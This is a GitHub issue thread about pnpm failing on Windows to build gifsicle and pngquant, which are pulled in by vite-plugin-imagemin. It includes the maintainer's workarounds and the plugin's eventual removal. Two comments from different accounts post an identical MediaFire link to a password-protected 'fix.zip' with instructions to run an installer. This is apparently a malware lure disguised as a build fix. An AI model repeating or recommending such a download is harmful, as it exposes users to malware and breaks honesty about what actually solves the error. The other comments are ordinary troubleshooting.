### ISSUE TITLE
windowspnpm很多都不能build...比如gifsicle

### ISSUE THREAD

**Issue by billmi** [oyjt/uniapp-vue3-template#23]
.../gifsicle@5.2.0/node_modules/gifsicle postinstall$ node lib/install.js
│   ‼ getaddrinfo ENOENT raw.githubusercontent.com
│   ‼ gifsicle pre-build test failed
│   i compiling from source
│   × Error: Command failed: C:\windows\system32\cmd.exe /s /c "autoreconf -ivf"
│ 'autoreconf' �����ڲ����ⲿ���Ҳ���ǿ����еĳ���
│ ���������ļ���
│     at D:\phpstudy_pro\WWW\uni\uniapp-vue3-template\node_modules\.pnpm\execa@0.7.0\node_modules\execa\index.js:231:11
│     at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
│     at async Promise.all (index 0)

│ getaddrinfo ENOENT raw.githubusercontent.com
│ compiling from source
│ pngquant pre-build test failed
│ Error: pngquant failed to build, make sure that libpng-dev is installed
│     at D:\phpstudy_pro\WWW\uni\uniapp-vue3-template\node_modules\.pnpm\execa@0.7.0\node_modules\execa\index.js:231:11
│     at process.processTicksAndRejections (node:internal/process/task_queues:95:5)
│     at async Promise.all (index 0)

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by oyjt** [comment]
`vite-plugin-imagemin`这个图片压缩插件导致的，如果不用这个插件可以删除后再安装。

这里贴一下`vite-plugin-imagemin`的[相关说明](https://github.com/vbenjs/vite-plugin-imagemin/tree/main#readme)

由于` imagemin` 在中国不好安装。现提供几个解决方案

使用 `yarn` 在 `package.json` 内配置(推荐)
```
"resolutions": {
"bin-wrapper": "npm:bin-wrapper-china"
},
```
使用 `npm`,在电脑 `host` 文件加上如下配置即可
```
199.232.4.133 raw.githubusercontent.com
```
使用 `cnpm` 安装(不推荐)

**Comment by yuanzougaofei97** [comment]
在电脑 host 也不行，几种方法都不行。我觉得就不应该用这个插件，我看几年都没维护了。

**Comment by Appidd** [comment]
pnpm install --ignore-scripts可以解决

**Comment by oyjt** [comment]
综合各种因素，项目中已经移除`vite-plugin-imagemin`这个插件
